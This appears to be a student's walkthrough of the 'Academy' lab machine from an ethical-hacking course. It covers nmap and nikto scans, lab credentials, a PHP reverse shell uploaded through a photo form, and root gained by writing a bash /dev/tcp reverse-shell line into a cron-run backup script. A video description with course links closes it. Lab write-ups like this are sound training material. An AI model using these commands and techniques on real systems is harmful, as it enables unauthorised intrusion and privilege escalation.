PEH Capstone - Google Drive
drive.google.com
Walkthrough
Gaining a Foothold
Nmap
192.168.88.133
┌──(root㉿kali)-[~]
└─# nmap -p- -A -T4 192.168.88.133
Starting Nmap 7.94 ( [https://nmap.org](https://nmap.org/) ) at 2023-11-02 02:31 EDT
Nmap scan report for 192.168.88.133
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.88.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|*End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|* 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:12:8A:DE (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.88.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.52 secondsPort 22
Interesting items:
SSH
OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Port 21
Interesting items:
FTP vsftpd 3.0.3 ftp-anon: Anonymous FTP login allowed (FTP code 230) _-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
FTP server status: Connected to ::ffff:192.168.88.129 Logged in as ftp TYPE: ASCII No session bandwidth limit Session timeout in seconds is 300 Control connection is plain text Data connections will be plain text At session startup, client count was 3 vsFTPd 3.0.3 - secure, fast, stable
Port 80
Interesting items:
HTTP
80/tcp open http Apache httpd 2.4.38 ((Debian)) http-server-header: Apache/2.4.38 (Debian) http-title: Apache2 Debian Default Page: It works
Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation
https://www.exploit-db.com/exploits/46676
HTTP Request Smuggling attack
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-613554/Apache-Http-Server-2.4.38.html
Apache HTTP Server privilege escalation from modules' scripts (CVE-2019-0211)
mod_ssl access control bypass (CVE-2019-0215)
https://httpd.apache.org/security/vulnerabilities_24.html
Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)
https://httpd.apache.org/security/vulnerabilities_24.html
/icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
/phpmyadmin/: phpMyAdmin directory found.
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
Nikto
┌──(root㉿kali)-[~] └─# nikto -h http://192.168.88.133
- Nikto v2.5.0
- Target IP: 192.168.88.133
- Target Hostname: 192.168.88.133
- Target Port: 80
- Start Time: 2023-11-02 02:37:37 (GMT-4)
- Server: Apache/2.4.38 (Debian)
- /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
- /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
- No CGI Directories found (use '-C all' to force check all possible dirs)
- /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c37b0dee585e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
- Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
- OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
- /phpmyadmin/changelog.php: Cookie goto created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Cookie back created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
- /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
- /phpmyadmin/: phpMyAdmin directory found.
- /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
- 8254 requests: 0 error(s) and 12 item(s) reported on remote host
- End Time: 2023-11-02 02:37:50 (GMT-4) (13 seconds)
- 1 host(s) tested
Default Web Page
Readme files exposed
Information Disclosure
404 - Information Disclosure
Server Header - Information Disclosure
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
version 4.9.7
MySQL
Login credentials exposed in plaintext in note.txt
login: 10201321
password: cd73502828457d15655bbd7a63fb0bc8
Password: student
Exposed admin credentials in config.php
Logged in as 10201321:student
Student login page on 192.168.88.133/academy
Any image or file can be uploaded in the Student Registration under my profile
Exploitation
PHP reverse shell uploaded instead of a photo in student registration
Edited PHP reverse shell to point to the attacker machine and listened on the attacker machine
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
reverse shell saved and edited
Listener set up in the attacker machine and reverse shell uploaded in student registration.
Privilege escalation
Linpeas
Download linpeas.sh on attack machine and transfer it across to the target machine using web server and get command
Myphpadmin and other credentials exposed
ssh grimmie@192.168.137.129
My_V3ryS3cur3_P4ss
Pspy
Ran pspy64 on grimmie@academy to confirm that backup.sh runs every minute
Bash Reverse Shell
Edit the content of backup.sh to contain “bash -i >& /dev/tcp/192.168.137.128/8081 0>&1”
Gained root access after listening on port 8081
Video
When you click the link below, it will start from the Academy Walkthrough.
Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
0:00 - Introduction 0:17 - Hunting Subdomains Part 1 5:54 - Hunting Subdomains Part 2 10:46 - Identifying Website Technologies 17:57 - Gathering Information w/ Burp Suite 26:49 - Google Fu 32:24 - Utilizing Social Media 38:05 - Installing Kioptrix 44:28 - Scanning w/ Nmap 1:04:16 - Enumerating HTTP/HTTPS Part 1 1:19:22 - Enumerating HTTP/HTTPS Part 2 1:34:35 - Enumerating SMB 1:48:59 - Enumerating SSH 1:53:11 - Researching Potential Vulnerabilities 2:08:05 - Our Notes So Far 2:11:15 - Scanning w/ Nessus Part 1 2:21:54 - Scanning w/ Nessus Part 2 2:28:07 - Reverse Shells vs Bind Shells 2:35:12 - Staged vs Non-Staged Payloads 2:38:37 - Gaining Root w/ Metasploit 2:46:21 - Manual Exploitation 2:59:06 - Brute Force Attacks 3:07:00 - Credential Stuffing & Password Spraying 3:21:07 - Our Notes, Revisited 3:24:56 - Downloading Our Materials 3:30:17 - Buffer Overflows Explained 3:34:29 - Spiking 3:44:46 - Fuzzing 3:50:59 - Finding the Offset 3:56:22 - Overwriting the EIP 3:59:51 - Finding Bad Characters 4:07:46 - Finding the Right Module 4:16:16 - Generating Shellcode and Gaining Root 4:22:16 - Python3 and More 4:36:01 - Capstone Introduction 4:41:47 - Setting up Blue 4:45:48 - Blue Walkthrough 5:02:53 - Academy Setup 5:05:22 - Academy Walkthrough 5:49:46 - Dev Walkthrough 6:15:10 - Butler Walkthrough 6:51:33 - Blackpearl Walkthrough 7:15:08 - Conclusion Full Course: https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course All Course Resources/Links: https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources A shout out to all those involved with helping out on this course: Alek - Creating "Academy", "Dev", and "Black Pearl" Capstone machines and a Discord Admin. Dewalt, Yaseen, Likith, and Tuk - The five star support team. Dwight - Discord Admin and awesome hacker. Grimmie - Creation of SumRecon, lover of cookies, and a Discord Admin. Joe Helle - Creating the "Blue" Capstone machine and the PNPT foothold. The OG support staff and a Discord Admin. Lian - The OG Discord Admin with French Bulldogs I'd like to steal. Rumham - Discord Admin, lover of rum and hams, and overall great guy. ❓Info❓ ___________________________________________ Pentests & Security Consulting: https://tcm-sec.com Get Trained: https://academy.tcm-sec.com Get Certified: https://certifications.tcm-sec.com Merch: https://merch.tcm-sec.com Sponsorship Inquiries: info@thecybermentor.com 📱Social Media📱 ___________________________________________ Twitter: https://twitter.com/thecybermentor Twitch: https://www.twitch.tv/thecybermentor Instagram: https://instagram.com/thecybermentor LinkedIn: https://www.linkedin.com/in/heathadams Discord: https://discord.gg/tcm 💸Donate💸 ___________________________________________ Like the channel? Please consider supporting me on Patreon: https://www.patreon.com/thecybermentor Support the stream (one-time): https://streamlabs.com/thecybermentor My Build: lg 32gk850g-b 32" Gaming Monitor:https://amzn.to/30C0qzV darkFlash Phantom Black ATX Mid-Tower Case: https://amzn.to/30d1UW1 EVGA 2080TI: https://amzn.to/30d2lj7 MSI Z390 MotherBoard: https://amzn.to/30eu5TL Intel 9700K: https://amzn.to/2M7hM2p G.SKILL 32GB DDR4 RAM: https://amzn.to/2M638Zb My Recording Equipment: Panasonic G85 4K Camera: https://amzn.to/2Mk9vsf Logitech C922x Pro Webcam: https://amzn.to/2LIRxAp Aston Origin Microphone: https://amzn.to/2LFtNNE Rode VideoMicro: https://amzn.to/309yLKH Mackie PROFX8V2 Mixer: https://amzn.to/31HKOMB Elgato Cam Link 4K: https://amzn.to/2QlicYx Elgate Stream Deck: https://amzn.to/2OlchA5 *We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites.
youtu.be
